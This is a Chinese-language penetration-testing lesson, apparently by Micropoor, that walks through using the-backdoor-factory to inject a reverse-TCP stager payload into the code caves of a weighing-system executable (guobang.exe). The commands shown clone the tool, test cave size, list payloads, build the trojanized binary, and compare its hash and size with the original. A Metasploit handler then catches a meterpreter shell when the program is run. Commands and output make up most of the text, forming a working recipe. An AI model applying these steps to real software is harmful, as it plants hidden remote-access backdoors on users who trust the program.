# 第九课:工具介绍-the-backdoor-factory 项目地址: ## 原理 可执行二进制文件中有大量的 00,这些 00 是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp 到代码段,来触发 payload。 ## 以项目中的过磅系统为例: ```bash root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git //安装the-backdoor-factory ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnlYRh7H5h-1bIk%2Fbaa5f2ef8bc4b8332d377e179c2897d1.jpg?generation=1551060452382777\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S //检测是否支持后门植入 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnnxPf0wWxDOnLf%2F65f5db4ee779eaacdff8a20bdfd35ea8.jpg?generation=1551060446680834\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150 //测试裂缝空间size150 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnpUH0ApLUgJIe7%2F2b8e42c3fe1195f37bf7b01fb31af21b.jpg?generation=1551060438052523\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show //查看可用payload ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnrdey7Kfb796h2%2Fc576aabd967bcbbf39467dcf40ec2759.jpg?generation=1551060449053503\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded //插入payload,并生成文件。 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqntGvelhg1wyy0N%2F1dbc7c753b5135a67db8ac3bee6f3352.jpg?generation=1551060428696462\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe //对比原文件与生成文件MD5值 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnv6TkhNpnFTwb9%2F999c8d02e798b61f61a4d8cd284ffd0b.jpg?generation=1551060459847276\&alt=media) ```bash root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe //对比文件大小 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnxzQX0sIVWLXIz%2Fedd13750f6b3e03121e63e805b4a5b97.jpg?generation=1551060427458627\&alt=media) ```bash msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.111 lhost => 192.168.1.111 msf exploit(handler) > set lport 8080 lport => 8080 msf exploit(handler) > exploit -j //开启本地监听 ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnzy9cnLFdBVB1e%2F94330fb03737c7e42549f1b9b3a8bb21.jpg?generation=1551060430698791\&alt=media) //打开软件\ ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo05ZzWWs26q4qv%2F2139e4a1c0c1e326605cf246742ff3a5.jpg?generation=1551060429432002\&alt=media) ```bash meterpreter > getuid Server username: John-PC\John ``` //确定目标 ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo2xVp9DZANqk1m%2F613afd4b9343cfd43965aa934b71cc48.jpg?generation=1551060439309972\&alt=media) \--By Micropoor